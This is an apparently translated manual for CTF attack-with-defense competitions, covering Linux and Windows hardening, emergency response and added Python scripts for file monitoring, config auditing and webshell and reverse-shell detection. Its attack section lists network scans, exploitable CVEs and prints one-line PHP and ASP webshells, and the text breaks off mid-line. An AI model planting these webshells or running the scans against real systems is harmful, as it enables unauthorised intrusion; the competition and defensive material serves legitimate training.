Title: AWD offensive and defense competition instruction manual

0# What is AWD

0.1# Introduction to AWD Competition System

Attack and Defense mode, AWD (Attack With Defense), is one of the main game modes of CTF (Capture The Flag) competitions and is mostly used in offline (on-site) events.

In this mode every team receives an identical initial environment (called the GameBox) that runs one or more services or applications, and these usually contain security vulnerabilities. Teams score points by exploiting the vulnerabilities in other teams' services to obtain flags; at the same time, each team must patch the vulnerabilities in its own services so that other teams cannot attack them and take its flags.

Its main characteristics are practicality, real-time play and direct confrontation; it tests both the penetration and the protection capabilities of a team.

0.2# Overall process of the competition

Preparation phase: several target servers are allocated to us, and we are usually given SSH or VNC usernames and passwords together with the related IP addresses and other information.

Security hardening phase: we log in to our own target servers and have 30 minutes for hardening (source code backup, weak password changes, code auditing and repair, vulnerability patching, etc.).

Free attack phase: once the hardening time is over, the free attack phase begins. Attacking other teams' target servers (weak passwords, web vulnerabilities, system vulnerabilities, etc.) earns extra points, and the attacked team loses the corresponding points.

1# Competition environment

Usually there are three kinds of competition environment:

Mixed target machines: operations machine Windows 10 + attack machine Kali Linux + Windows target machine (Windows Server 2003/2008/2012 or Windows 7) + Linux target machine (CentOS 7.x or Ubuntu 16.04/17.01/20.04)

Linux-only target machines: operations machine Windows 10 + attack machine Kali Linux + Linux target machine (CentOS 7.x or Ubuntu 16.04/17.01/20.04)

Windows-only target machines: operations machine Windows 10 + attack machine Kali Linux + Windows target machine (Windows Server 2003/2008/2012 or Windows 7)

2# Security Reinforcement Process (Defense)

2.0# Basic reinforcement process

2.0.1 Windows Reinforcement Process

Backup first: Web source code, database

Harden port 445 (SMB): enable the firewall or an IP security policy to block it

Turn on the system log audit function

Disable guest account and close file sharing

Make sure the content of the startup item is controllable

Limit the number of remote access connections: in the Local Group Policy Editor, expand Computer Configuration - Administrative Templates - Windows Components - Remote Desktop Services - Remote Desktop Session Host - Connections - Limit number of connections

Use tools to monitor key directories and files: file operation monitoring.exe, Yujian file monitoring.exe.

Look for malicious code files with PCHunter and Monitor

Search the web directory for suspicious files (jpg/png/rar, etc.): check their attributes, and decompress archives to inspect their contents

Scan NTFS disks for hidden alternate data streams

Enumerate all accounts on the system and disable every account other than Administrator.

Change the web site's admin path, the default admin password and the database password

Deploy a WAF script to protect the web site and block attacks on any remaining vulnerabilities

2.0.2 Linux reinforcement process

Backup first: Web source code, database

Modify the system password, unified team password

Search for historical commands through .bash_history and find traces

View scheduled tasks: crontab -l; edit scheduled tasks: crontab -e

Check the startup services in /etc/init.d/ and /etc/rc.local for anything abnormal

Use scripts to enable process monitoring, directory monitoring, and traffic monitoring

Web site password, site administrator path modification

System hardening: iptables
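
The "directory monitoring" item above is normally done with a small script that compares the web root against the backup made in the first step. The script below is an added example written for this guide, not code from the original post: it hashes every file under the web root, compares the result with the backup copy, reports added, modified and deleted files, and restores the backup version. The paths /var/www/html and /tmp/web_backup are assumed defaults.

```python
import hashlib
import os
import shutil
import sys
import time

# Added example, not from the original post. The web root and the backup
# directory created in the "Backup first" step are assumed placeholder paths.
DEFAULT_WEB_ROOT = "/var/www/html"
DEFAULT_BACKUP = "/tmp/web_backup"


def file_hashes(root):
    """Return {relative path: sha256 hex digest} for every regular file under root."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            hashes[os.path.relpath(full, root)] = digest.hexdigest()
    return hashes


def diff_snapshots(baseline, current):
    """Classify the differences between two {path: hash} snapshots."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "deleted": deleted, "modified": modified}


def restore_changes(web_root, backup_root, changes):
    """Delete planted files and copy back originals that were changed or removed."""
    for rel in changes["added"]:
        os.remove(os.path.join(web_root, rel))
    for rel in changes["modified"] + changes["deleted"]:
        src = os.path.join(backup_root, rel)
        dst = os.path.join(web_root, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(src, dst)


def monitor(web_root, backup_root, interval=5, rounds=None):
    """Poll the web root; every difference from the backup is logged and reverted."""
    baseline = file_hashes(backup_root)
    done = 0
    while rounds is None or done < rounds:
        changes = diff_snapshots(baseline, file_hashes(web_root))
        if any(changes.values()):
            print(time.strftime("%H:%M:%S"), "changes detected:", changes)
            restore_changes(web_root, backup_root, changes)
        done += 1
        time.sleep(interval)


if __name__ == "__main__":
    web = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_WEB_ROOT
    backup = sys.argv[2] if len(sys.argv) > 2 else DEFAULT_BACKUP
    monitor(web, backup)
```

Stop the monitor while you patch your own code and refresh the backup afterwards, otherwise the fix is reverted as an unauthorised change. Because it compares hashes rather than timestamps, a file whose mtime an attacker resets with touch is still caught.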

2.1# Basic information collection

When defending, information gathering is just as important. As the saying goes: know yourself and know your enemy, and you will never be defeated in a hundred battles.

2.1.1 Clarify Linux machine information

uname -a //System information

ps -aux //Query process information

ps -ef | grep process name //Filter the specified process

id //Used to display the user ID and the group ID

cat /etc/passwd //View user situation

ls /home/ //Check which users have home directories

find / -type d -perm -002 //Find world-writable directories

ifconfig //View network card information on Linux

2.1.2 Clarify Windows machine information

whoami /all //View user details on Windows

ipconfig /all //View network card information on Windows

2.1.3 View Open Port

netstat //View active connections

netstat -ano (Windows) / netstat -a (Linux) //Check port status

netstat -anp //View ports together with the owning process (Linux)

firewall-cmd --zone=public --remove-port=80/tcp --permanent //Close the port

firewall-cmd --reload //Reload the firewall

2.1.4 Default password (weak password) change

To prevent weak password attacks: the MySQL password is root by default, and the phpStudy default password is 123456

Other common default passwords are admin, top100, top1000 and so on.

In particular, change the back-end (admin) password of the web application.

passwd username //Change the SSH (system account) password

set password for mycms@localhost=password('18ciweufhi28746'); //Change the MySQL password

find /var/www/html -path '*config*' //Find credentials stored in configuration files

2.1.5 Find local flag

grep -r 'flag' /var/www/html/ //Linux: search the web directory for flags

findstr /s /i "flag" *.* //Windows: search for the string "flag" in all files in the current directory and its subdirectories

2.1.6 Setting ping disabled

echo '1' > /proc/sys/net/ipv4/icmp_echo_ignore_all //Temporarily ignore ping (until reboot)

echo '0' > /proc/sys/net/ipv4/icmp_echo_ignore_all //Respond to ping again

2.2# Web Security Reinforcement

2.2.1 Backup source code

A backup protects against mistakes made while modifying the source code and against an attacker deleting it, and it is what you restore from

Compressed source code:

tar -cvf web.tar /var/www/html

zip -q -r web.zip /var/www/html

Decompress the source code:

tar -xvf web.tar -C /var/www/html

unzip web.zip -d /var/www/html

Backup source code:

mv web.tar /tmp

mv web.zip /home/xxx

Upload and download source code:

scp username@servername:/path/filename /tmp/local_destination //Download a single file from the server to the local machine

scp /path/local_filename username@servername:/path //Upload a single file from the local machine to the server

scp -r username@servername:remote_dir /tmp/local_dir //Download an entire directory from the server to the local machine

scp -r /tmp/local_dir username@servername:remote_dir //Upload an entire directory from the local machine to the server

2.2.2 Set read-only permissions

Set read-only and execution permissions for web files (execution permissions are required for dynamic languages such as PHP)

chmod 0555 /var/www/html/*

chmod 0555 /var/www/html/*.php

Set read-only and execution permissions in the web root directory

chmod 0555 /var/www/html

Change the file's owner and group to set strict permissions

chown -R root:root /var/www/html/ //Set the owner to root:root, or httpd:httpd (recommended)

chown -R apache:apache /var/www/html/ //Make sure the apache user owns /var/www/html/

2.2.3 Configuration .htaccess

Use an .htaccess configuration file to prohibit execution of PHP files. (Note: a <Directory> block is only valid in the main server configuration; an .htaccess file applies to the directory it is placed in, so there it contains just the directives inside the block.)

<Directory "/var/www/html/upload"> //The directives that follow apply to the specified directory

Options -ExecCGI -Indexes //Disable CGI execution and directory indexing (listing the directory contents) in this directory

AllowOverride None //The server configuration cannot be overridden by an .htaccess file in this directory

RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml

RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml

//These two directives remove the handler and the MIME type for the listed file extensions.

//Here they remove the PHP-related extensions and server-side include (SSI) file types from Apache's processing list.

php_flag engine off //Sets the PHP engine flag to off, which disables execution of PHP scripts in this directory.

<FilesMatch ".+\.ph(p[3457]?|t|tml)$">

deny from all

</FilesMatch> //These three lines use a regular expression to match files ending in .php, .phtml, .php3, .pht, .php4, .php5, .php7 or .shtml and deny all access to them

</Directory>

2.2.4 PHP parameter security configuration

First find the PHP configuration file

/etc/php/{version}/php.ini

Disable high-risk functions

disable_functions=dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link

Configure open_basedir (limits the activity range of user access files to specified areas)

open_basedir=/var/www/html

Disable magic quotes (a legacy feature that automatically escaped external input to mitigate SQL injection; it was removed in PHP 5.4, so this setting only matters on older versions)

magic_quotes_gpc=Off

Disable remote URL wrappers (PHP pseudo-protocols)

allow_url_fopen=Off

allow_url_include=Off

Restart PHP

sudo service php7.0-fpm restart

sudo systemctl restart php7.0-fpm.service
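
To check whether a php.ini actually carries the settings listed in this section, the following Python script (an added example, not code from the original post) parses the file and reports every recommended setting that is missing or weak. The two ini fragments inside it are constructed samples, and the php.ini path used in the main block is an assumption.

```python
# Added example, not from the original post: audit a php.ini against the
# settings recommended in section 2.2.4. The two ini fragments are constructed.
REQUIRED_DISABLED = {
    "dl", "exec", "system", "passthru", "popen", "proc_open", "pcntl_exec",
    "shell_exec", "mail", "imap_open", "imap_mail", "putenv", "ini_set",
    "apache_setenv", "symlink", "link",
}
# PHP's built-in defaults when a key is absent from php.ini
DEFAULTS = {"allow_url_fopen": "On", "allow_url_include": "Off"}

WEAK_INI = """\
[PHP]
; constructed sample: a stock php.ini with none of the hardening applied
disable_functions =
open_basedir =
allow_url_fopen = On
allow_url_include = On
"""

HARDENED_INI = """\
[PHP]
; constructed sample: the settings from section 2.2.4 applied
disable_functions = dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link
open_basedir = /var/www/html:/tmp
allow_url_fopen = Off
allow_url_include = Off
"""


def parse_php_ini(text):
    """Minimal php.ini reader: key = value lines, ';' comments, [sections] ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_off(value):
    """PHP treats Off, 0, false, no and an empty value as disabled."""
    return value.strip().lower() in ("off", "0", "false", "no", "")


def audit_php_ini(text, web_root="/var/www/html"):
    """Return a list of findings; an empty list means every checked setting is hardened."""
    s = parse_php_ini(text)
    findings = []
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ",".join(missing))
    base = s.get("open_basedir", "")
    if not base:
        findings.append("open_basedir is not set")
    elif web_root not in base.split(":"):
        findings.append("open_basedir does not include " + web_root)
    for key, default in DEFAULTS.items():
        if not is_off(s.get(key, default)):
            findings.append(key + " is enabled")
    return findings


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/php/7.0/fpm/php.ini"  # assumed path
    with open(path, encoding="utf-8", errors="replace") as fh:
        for finding in audit_php_ini(fh.read()) or ["no findings"]:
            print(finding)
```

Run it against the ini file of the SAPI that is really in use (php-fpm and Apache mod_php read different files), since hardening the wrong one changes nothing. magic_quotes_gpc is not checked because PHP 5.4 removed it.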

2.3# Database security reinforcement

2.3.1 Mysql reinforcement

To prevent weak password attacks: the MySQL password is root by default, and the phpStudy default password is 123456

Do not keep the default password; change it to a complex one and make sure the web application's configuration still connects with the new one

Allow only local (127.0.0.1) logins: set bind-address=127.0.0.1 and add secure_file_priv=NULL to the configuration file

Enable the log audit function: general_log_file=path (general_log=1 is also needed to actually turn the general log on)

Because MySQL is the most commonly used database, most of the basic attack and defense work uses MySQL commands

Backup the specified database:

mysqldump -u username -ppassword databasename > target.sql //No space between -p and the password, or omit the password to be prompted for it

Backup all databases:

mysqldump -u username -ppassword --all-databases > all.sql

Import the database:

mysql -u username -ppassword databasename < from.sql

For MySQL's offense and defense, you can read this article: https://blog.zgsec.cn/archives/26.html

MySQL default configuration file path:

C:\Program Files\MySQL\MySQL Server 5.1\my.ini //Windows

/etc/my.cnf //Linux

/etc/mysql/my.cnf //Linux

Modify the secure_file_priv parameter (the directory that the file and log functions are allowed to write to)

secure_file_priv=''

Reload the MySQL privilege tables

FLUSH PRIVILEGES;

Restart MySQL service

sudo service mysql restart

sudo systemctl restart mysql

2.3.2 Mssql reinforcement

Delete unnecessary accounts

SQLServer user password security

Give each user a separate account instead of sharing accounts

Assign the minimum permissions required for database users

Network access restrictions

SQLServer login audit

SQLServer security incident audit

Configure logging function

2.4# Remote control reinforcement

2.4.1 SSH safety reinforcement

Restrict which IP addresses may log in

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

AllowUsers testuser@192.168.1.100 //Find (or add) this line, make sure it is uncommented and set to the desired user and IP address

Disable root remote login

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

PermitRootLogin no //Set PermitRootLogin to "no"

Restrict SSH login by user and group

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

AllowUsers testuser //Set only allows testuser to log in to SSH

AllowUsers testuser@192.168.1.100 //Only allow the testuser account to log in over SSH from 192.168.1.100

AllowGroups test //Whitelist a user group

//Note: if AllowUsers and AllowGroups are both specified, a user must match both of them to be allowed to log in over SSH

Restart SSH service

sudo service sshd restart

sudo systemctl restart sshd.service
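
The same kind of check for sshd_config, as an added example that is not part of the original post: it parses the global section the way sshd does (the first value of a keyword wins) and reports deviations from the settings above. The two config texts inside it are constructed samples.

```python
# Added example, not from the original post: audit sshd_config for the
# settings in section 2.4.1. Both config texts below are constructed samples.
WEAK_SSHD = """\
# constructed sample: settings that still allow root and any user to log in
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_SSHD = """\
# constructed sample: the restrictions from section 2.4.1 applied
PermitRootLogin no
AllowUsers testuser@192.168.1.100
AllowGroups test
"""


def parse_sshd_config(text):
    """Global section of sshd_config as {keyword (lower-case): first value}.

    sshd keeps the first value it sees for a keyword, so later duplicates are
    ignored here too; lines after a Match block are conditional and skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match"):
            break
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        conf.setdefault(parts[0].lower(), parts[1].strip())
    return conf


def audit_sshd_config(text):
    """Return findings against the 2.4.1 recommendations; an empty list means compliant."""
    c = parse_sshd_config(text)
    findings = []
    # absent keyword: OpenSSH's default is prohibit-password, which still admits root with a key
    if c.get("permitrootlogin", "prohibit-password").lower() != "no":
        findings.append("PermitRootLogin is not 'no'")
    if "allowusers" not in c and "allowgroups" not in c:
        findings.append("no AllowUsers/AllowGroups whitelist")
    unrestricted = [u for u in c.get("allowusers", "").split() if "@" not in u]
    if unrestricted:
        findings.append("AllowUsers entries without a source host: " + " ".join(unrestricted))
    return findings


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/ssh/sshd_config"
    with open(path, encoding="utf-8", errors="replace") as fh:
        for finding in audit_sshd_config(fh.read()) or ["no findings"]:
            print(finding)
```

After editing sshd_config, run sshd -t to syntax-check it before restarting, and keep an existing session open: a typo in AllowUsers locks everyone out.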

2.4.2 RDP remote login security reinforcement

Delete the default account and add new users manually:

Step 1: Press Win + R to open the Run dialog box, enter secpol.msc and click OK

Step 2: Navigate to Local Policies - User Rights Assignment, then double-click "Allow log on through Remote Desktop Services"

Step 3: Remove Administrators and Remote Desktop Users (and any other user or group on the computer) listed in this window

Step 4: After that click "Add User or Group" and manually add the user you want to grant remote desktop access.

Change the default RDP port number:

Step 1: Open the Run dialog box, enter regedit and click OK

Step 2: Open HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, scroll down and find PortNumber and double-click it

Step 3: Select "Decimal", modify the port number you want to set, and then click "OK"

2.5# Emergency Response

2.5.1 Query processes and connections

netstat

ps -aux

netstat -apt

2.5.2 Kill the process

kill -9 pid //on Linux

taskkill /f /pid pid //on Windows

2.5.3 Search WebShell Files

find /var/www/html -name '*.php' -mmin -5 //List PHP files modified in the last 5 minutes

find ./ -name '*.php' | xargs wc -l | sort -n //List PHP files sorted by line count; the files with the fewest lines are usually the Trojans

grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html //Find PHP files that contain the eval($_POST keyword

find /var/www/html -type f -name '*.php' | xargs grep 'eval(' | more //Combine find, grep and xargs: find every .php file under /var/www/html, search those files for lines containing 'eval(', and page through the results with more when the output is long
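
The four commands above can be combined into one scanner. The Python script below is an added example, not code from the original post: it walks the web root, applies the content indicators the grep commands look for plus a few equivalents (assert, system/exec and base64_decode applied to request data), and records each hit's line count and whether it was modified within the last five minutes. The /var/www/html default is an assumption.

```python
import os
import re
import sys
import time

# Added example, not from the original post. It automates the find/grep
# checks in section 2.5.3: content indicators plus recent-modification time.
PATTERNS = {
    "eval on request data": re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "assert on request data": re.compile(r"\bassert\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "command execution on request data": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "decoder on request data": re.compile(
        r"\b(base64_decode|gzinflate|str_rot13)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
}
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".pht")


def scan_content(text):
    """Return the names of every indicator that matches the file content."""
    return [name for name, pat in PATTERNS.items() if pat.search(text)]


def scan_dir(root, recent_minutes=5, extensions=PHP_EXTENSIONS, now=None):
    """Scan files under root; return {relative path: info} for files with indicators.

    extensions=None scans every file, which also finds shells hidden in .jpg/.png."""
    now = time.time() if now is None else now
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if extensions and not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            reasons = scan_content(text)
            if not reasons:
                continue
            age_min = (now - os.path.getmtime(path)) / 60.0
            hits[os.path.relpath(path, root)] = {
                "reasons": reasons,
                "lines": len(text.splitlines()),      # short files are the usual one-liners
                "recent": age_min <= recent_minutes,  # same idea as find -mmin -5
            }
    return hits


if __name__ == "__main__":
    web_root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"  # assumed path
    for rel, info in sorted(scan_dir(web_root).items()):
        print(rel, info)
```

Like the grep commands it is built on, it only catches direct patterns: a shell that first copies $_POST into a variable or builds the function name at run time is missed, so still review short and recently modified files by hand. Passing extensions=None scans every file, which catches shells stored as .jpg or .png that a parsing vulnerability would execute.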

2.5.4 Find and kill the Trojan

You can also use a single command to find and kill it automatically (it kills every process running as www-data, including the web server's own workers, which is why the service is restarted afterwards)

ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9

Then restart the service

service php-fpm restart

2.5.5 Kill a reverse shell

As usual, list the processes first

ps -ef

ps -aux

ps -aux | grep www-data

Note: a /bin/sh process running as www-data is very likely an nc (netcat) reverse shell

Then the usual command

kill $(ps -aux | grep www-data | grep apache2 | awk '{print $2}')
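
To automate the check above, the following Python script (an added example, not code from the original post) parses ps output and flags processes that run as the web server account but whose executable is a shell or a netcat-style tool. The process list embedded in it is a constructed sample, not a capture from a real machine.

```python
import os
import re
import signal
import subprocess

# Added example, not from the original post. Automates the check in 2.5.5:
# shell or netcat processes owned by the web server account.
SHELL_BINARIES = {"sh", "bash", "dash", "zsh", "nc", "ncat", "netcat", "socat", "telnet"}
SERVICE_USERS = {"www-data", "apache", "nginx", "nobody"}

# Constructed sample of `ps -eo pid,ppid,user,args` output (not a real capture).
SAMPLE_PS = """\
    PID    PPID USER     COMMAND
      1       0 root     /sbin/init
    812       1 root     /usr/sbin/sshd -D
    930       1 root     /usr/sbin/apache2 -k start
    931     930 www-data /usr/sbin/apache2 -k start
    932     930 www-data /usr/sbin/apache2 -k start
   1201     931 www-data /bin/sh -i
   1202    1201 www-data nc 10.0.0.5 4444
   1300     931 www-data /usr/bin/php-cgi
"""

LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.+)$")


def parse_ps(output):
    """Turn ps output into a list of {pid, ppid, user, cmd}; the header line does not match."""
    procs = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs.append({"pid": int(m.group(1)), "ppid": int(m.group(2)),
                          "user": m.group(3), "cmd": m.group(4).strip()})
    return procs


def suspicious_processes(procs, users=SERVICE_USERS, binaries=SHELL_BINARIES):
    """Service-account processes whose executable is a shell or a netcat-style tool."""
    flagged = []
    for p in procs:
        if p["user"] not in users or not p["cmd"]:
            continue
        exe = os.path.basename(p["cmd"].split()[0])
        if exe in binaries:
            flagged.append(p)
    return flagged


def kill_processes(procs, dry_run=True):
    """Kill the flagged processes with SIGKILL; dry_run only reports what would be killed."""
    killed = []
    for p in procs:
        if not dry_run:
            os.kill(p["pid"], signal.SIGKILL)
        killed.append(p["pid"])
    return killed


def live_ps():
    """Read the real process list (Linux procps) in the same column order as SAMPLE_PS."""
    out = subprocess.run(["ps", "-eo", "pid,ppid,user,args"],
                         capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    flagged = suspicious_processes(parse_ps(live_ps()))
    for p in flagged:
        print("suspicious:", p)
    print("would kill:", kill_processes(flagged, dry_run=True))
```

Look at the PPID column of what it flags: a shell whose parent is an apache2 worker was spawned by the web application, which also tells you which service still needs patching. kill_processes defaults to a dry run; pass dry_run=False once you have checked the list.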

3# Free Attack (Attack)

3.0# Main content

Prepare the latest versions of the various CMS packages

Scanning tools: Nmap, Nessus, Metasploit (kept up to date)

Exploit scripts: PoC, Exp

3.1# Basic information collection

3.1.1 Host information collection

Nmap

nmap -sn 192.168.0.0/24 //Live-host scan of a class C segment

httpscan

httpscan.py 192.168.0.0/24 -t 10 //Live-host scan of a class C segment

3.1.2 Port Scan

nmap -sV 192.168.0.2 //Detect the versions of the services on the host

nmap -sS 192.168.0.2 //SYN scan of the host's commonly used ports

nmap -sS -p 80,445 192.168.0.2 //Scan selected ports of the host

nmap -sS -p- 192.168.0.2 //Scan all ports of the host

Python script

import requests

for x in range(2, 255):
    url = 'http://192.168.1.{}'.format(x)
    try:
        r = requests.post(url, timeout=3)  # timeout added so that a host that never answers cannot block the loop
        print(url)  # printed only when the host answered on port 80
    except requests.exceptions.RequestException:
        pass

3.2# External management

3.2.0 Common system vulnerabilities

MS17-010 (EternalBlue, see https://blog.zgsec.cn/archives/172.html)

MySQL UDF privilege escalation (via SQL injection or a weak MySQL password)

MSSQL system command execution (via SQL injection or a weak MSSQL password)

SSH weak password or default password

PWN (This depends on the specific content provided by the AWD competition)

3.2.1 Middleware vulnerability

IIS (parsing vulnerabilities, remote code execution)

Apache (parsing vulnerability)

Nginx (parsing vulnerability)

Jboss (CVE-2017-7504/CVE-2017-12149/CVE-2015-7501)

Mysql (weak password)

Tomcat (weak password Getshell)

Weblogic (CVE-2020-2551/CVE-2020-2555/CVE-2020-2883)

SpringBoot (Unauthorized access vulnerability and RCE vulnerability, please refer to https://blog.zgsec.cn/archives/129.html)

3.2.2 Vulnerability in integrated service environment

wampserver

XAMPP

3.2.3 CMS Vulnerability Exploit

Collect the latest version of CMS, as well as the corresponding vulnerabilities Poc and Exp, here only some of the CMS are listed:

Aspcms

Dedecms

Discuz

Drupal

Empirecms

Eshop

Finecms

Joomla

Lamp

Metainfo

Phpcms

Phpwind

Qibocms

Seacms

Semcms

ThinkPHP

Wolfcms

Wordpress

Zabbix

Backup file brute forcing: use a directory scanning tool such as 7kbScan to brute-force backup files on the web system

3.2.4 Upload WebShell

Common one-line Trojans (webshells)

PHP: <?php @eval($_POST['pass']); ?> or <?php eval($_GET['pass']); ?>

ASP: <%eval request("pass")%>

Aspx: %@ Page Language='Jscript
